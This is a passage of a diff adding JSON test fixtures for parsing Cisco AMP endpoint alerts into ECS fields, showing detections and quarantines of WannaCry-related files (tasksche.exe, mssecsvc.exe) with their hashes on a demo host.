+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419229331435814969",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:41:05.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094029167Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":73000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419229331435815000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419229331435814970",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:41:05.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094031077Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":26000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814968\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419229331435815000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Ransom:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419229331435814968",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:41:05.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094032961Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6419229331435815000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "detection_id": "6419229327140847660",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:41:05.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094035008Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6419229331435815000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "detection_id": "6419229327140847658",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:41:05.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094036925Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6419229331435815000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "detection_id": "6419229322845880359",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:41:04.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094038843Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":870000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229327140847671\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419229327140848000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419229327140847671",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "cmd.exe",
+                "pid": 5748,
+                "hash": {
+                    "sha1": "ee8cbf12d87c4d388f09b4f69bed2e91682920b5",
+                    "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae",
+                    "md5": "ad7b9c14083b52bc532fba5948342b98"
+                }
+            },
+            "@timestamp": "2021-01-14T14:41:04.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "md5": "84c82835a5d21bbcf75a61706d8ab549"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "84c82835a5d21bbcf75a61706d8ab549",
+                    "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094040732Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847666\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5748,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419229327140848000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.ED01EBFBC9-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419229327140847666",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "tasksche.exe",
+                "pid": 4772,
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "@timestamp": "2021-01-14T14:41:04.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "md5": "84c82835a5d21bbcf75a61706d8ab549"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "84c82835a5d21bbcf75a61706d8ab549",
+                    "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094042624Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":667000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":4772,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419229327140848000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.ED01EBFBC9-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419229327140847665",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "lsass.exe",
+                "pid": 708,
+                "hash": {
+                    "sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf",
+                    "sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71",
+                    "md5": "4e568dbe3fff1a0025eb432dc929b78f"
+                }
+            },
+            "@timestamp": "2021-01-14T14:41:04.000Z",
+            "file": {
+                "name": "mssecsvc.exe",
+                "path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe",
+                "hash": {
